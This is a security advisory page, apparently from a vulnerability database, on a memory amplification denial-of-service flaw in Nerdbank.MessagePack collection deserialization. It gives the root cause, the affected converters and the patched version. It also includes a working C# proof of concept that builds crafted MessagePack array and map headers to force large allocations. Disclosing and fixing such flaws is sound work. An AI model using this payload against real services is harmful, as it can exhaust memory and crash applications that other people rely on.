5.3

CVSS Score

3.1

-

CVSS Score

Basic Information

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

GHSA-qjvr-435c-5fjh

GHSA-qjvr-435c-5fjh: Nerdbank.MessagePack has a memory amplification DoS in collection deserialization

Nerdbank.MessagePack deserializers for many collection-shaped types trusted the element count declared in MessagePack array and map headers when allocating destination storage. A crafted payload could therefore force large arrays, pooled buffers, dictionaries, or collection instances to be allocated before the deserializer had consumed the corresponding elements.

The same allocation pattern existed across strongly typed arrays, primitive arrays, mutable and immutable dictionaries, mutable enumerables, span-backed enumerable construction, JsonNode, MessagePackValue, and the object/dynamic primitive converters.

Because MessagePack array and map headers carry an attacker-controlled element count, any converter that immediately allocates count elements or constructs a collection with capacity count can turn a payload that is merely large into a much larger managed heap allocation. The reader's residency checks reduce the most extreme header-only attack shape, but they do not remove the memory amplification: minimal MessagePack elements can be one or two bytes on the wire while the managed representation may require object references, dictionary buckets, entries, array headers, or over-allocated collection internals.

Vulnerability Pattern

Affected converters followed one or both of these patterns:

int count = reader.ReadArrayHeader();
TElement[] array = new TElement[count];

int count = reader.ReadMapHeader();
Dictionary<TKey, TValue> map = new(count);

or, for streaming and span-backed construction:

TElement[] elements = ArrayPool<TElement>.Shared.Rent(count);
TCollection collection = getCollection(state, count);

In all affected cases, the allocation size was derived from the untrusted header count before the converter had read the elements. This made deserialization vulnerable to memory amplification and process availability attacks.

Affected Scope

The vulnerable logic was present in multiple converter families:

| Converter surface | Risk | |-------------------|------| | ArrayConverter<TElement> | Allocated for typed arrays and rented large buffers in async paths. | | | Allocated or rented for primitive array and span-constructor paths. | | | Passed the untrusted count directly to collection construction. | | | Rented buffers sized to the declared element count. | | | Passed the untrusted map count directly to dictionary construction. | | | Rented before reading entries. | | and | Allocated object arrays and dictionaries from attacker-controlled counts. | | | Allocated from the declared array length. | | | Allocated arrays and dictionaries from declared array/map counts. |

Miggo Vulnerability Database

→

GHSA-qjvr-435c-5fjh

GHSA-qjvr-435c-5fjh:

5.3

CVSS Score

3.1

-

CVSS Score

Basic Information

Is this CVE running in your environment?

Easily map the attack path and prioritize which CVEs are a threat to your organization

Validate Exposure

Technical Details

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
Nerdbank.MessagePack	nuget	< 1.1.78	1.1.78

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability is a memory amplification Denial of Service (DoS) in Nerdbank.MessagePack's deserialization process for collection types. The root cause is that multiple converter classes responsible for deserializing arrays and maps would read the element count from the MessagePack header and immediately allocate memory for the entire collection before consuming the actual elements. An attacker could craft a small MessagePack payload with a large count in the header, followed by minimal data for the elements (e.g., nil values). This would cause the deserializer to allocate a very large array or dictionary in memory, potentially exhausting system resources and crashing the application (OutOfMemoryException) or causing severe performance degradation due to garbage collection pressure.

The vulnerability pattern, new T[count] or new Dictionary(count), was present across a wide range of converters, including those for typed arrays (ArrayConverter), primitive arrays (ArraysOfPrimitivesConverters), dictionaries (MutableDictionaryConverter, ImmutableDictionaryConverter), enumerables (MutableEnumerableConverter), and dynamic types (PrimitivesAsObjectConverter, JsonNodeConverter, MessagePackValueConverter).

The patch remediates this issue by changing the allocation strategy. Instead of pre-allocating the full size, the fix introduces a mechanism to grow the collections incrementally. For untrusted data, it starts with an empty or small collection and resizes it as more elements are read from the stream. This ensures that memory allocation is proportional to the actual data consumed, not the claimed size in the header, thus mitigating the amplification attack.

Vulnerable functions

Nerdbank.MessagePack.Converters.ArrayConverter<TElement>.Read

src/Nerdbank.MessagePack/Converters/ArrayConverter`1.cs

The function reads an array header to get a 'count' and immediately allocates an array of that size (`new TElement[count]`). This 'count' is controlled by the input data, allowing an attacker to cause a large memory allocation with a small payload, leading to a Denial of Service.

Vulnerability Intelligence
Miggo AI

Unlock WAF rules for this CVE

Generate vendor-ready rules for the observed attack patterns, plus reasoning and safe deployment guidance

Get WAF rules

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

using System.Buffers; using System.Buffers.Binary; using Nerdbank.MessagePack; Console.WriteLine("=== Memory Amplification DoS - Nerdbank.MessagePack ==="); Console.WriteLine(); var serializer = new MessagePackSerializer(); // 5-byte array32 header + 1 byte per nil element. // Deserializing as object?[] allocates one managed reference per element. const int ObjectArrayCount = 1_000_000; byte[] objectArrayPayload = BuildArray32Payload(ObjectArrayCount, 0xC0); Measure("object?[] array32 nil", objectArrayPayload, () => { var sequence = new ReadOnlySequence<byte>(objectArrayPayload); var reader = new MessagePackReader(sequence); return serializer.DeserializePrimitives(ref reader); }); // 5-byte array32 header + 1 byte per integer element. // A typed int[] target allocates four bytes per element plus array overhead. const int IntArrayCount = 1_000_000; byte[] intArrayPayload = BuildArray32Payload(IntArrayCount, 0x00); Measure("int[] array32 fixint", intArrayPayload, () => { var sequence = new ReadOnlySequence<byte>(intArrayPayload); var reader = new MessagePackReader(sequence); return serializer.Deserialize<int[]>(ref reader); }); // 5-byte map32 header + 2 bytes per entry: small fixint key, nil value. // Duplicate keys are overwritten later, but the Dictionary capacity allocation fires first. const int MapCount = 100_000; byte[] mapPayload = BuildMap32Payload(MapCount); Measure("object dictionary map32", mapPayload, () => { var sequence = new ReadOnlySequence<byte>(mapPayload); var reader = new MessagePackReader(sequence); return serializer.DeserializePrimitives(ref reader); }); static void Measure(string name, byte[] payload, Func<object?> deserialize) { GC.Collect(); long before = GC.GetTotalMemory(true); try { object? result = deserialize(); long after = GC.GetTotalMemory(false); long delta = after - before; Console.WriteLine($"[{name}] payload: {payload.Length / 1024.0:F1} KB"); Console.WriteLine($"[{name}] memory delta: +{delta / 1024.0 / 1024.0:F1} MB"); Console.WriteLine($"[{name}] amplification: {(double)delta / payload.Length:F1}x"); GC.KeepAlive(result); } catch (OutOfMemoryException) { Console.WriteLine($"[{name}] OutOfMemoryException"); } catch (MessagePackSerializationException ex) { Console.WriteLine($"[{name}] guarded: {ex.Message}"); } Console.WriteLine(); } static byte[] BuildArray32Payload(int count, byte element) { byte[] payload = new byte[5 + count]; payload[0] = 0xDD; BinaryPrimitives.WriteInt32BigEndian(payload.AsSpan(1), count); payload.AsSpan(5).Fill(element); return payload; } static byte[] BuildMap32Payload(int count) { byte[] payload = new byte[5 + count * 2]; payload[0] = 0xDF; BinaryPrimitives.WriteInt32BigEndian(payload.AsSpan(1), count); for (int i = 0; i < count; i++) { payload[5 + i * 2] = (byte)(i % 128); payload[5 + i * 2 + 1] = 0xC0; } return payload; }

5.3

-

Basic Information

Basic Information

Concerned about an active attack path?

GHSA-qjvr-435c-5fjh: Nerdbank.MessagePack has a memory amplification DoS in collection deserialization

Vulnerability Pattern

Affected Scope

GHSA-qjvr-435c-5fjh:

5.3

-

Basic Information

Basic Information

Is this CVE running in your environment?

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

Vulnerability IntelligenceMiggo AI

Unlock WAF rules for this CVE

WAF Protection Rules

WAF Rule

Reasoning

Basic Information

Basic Information

5.3

5.3

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

GHSA-qjvr-435c-5fjh: Nerdbank.MessagePack has a memory amplification DoS in collection deserialization

Vulnerability Pattern

Affected Scope

Attack Mechanics

Impact

Severity Rationale

Proof of Concept

Remediation

Prior Art

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI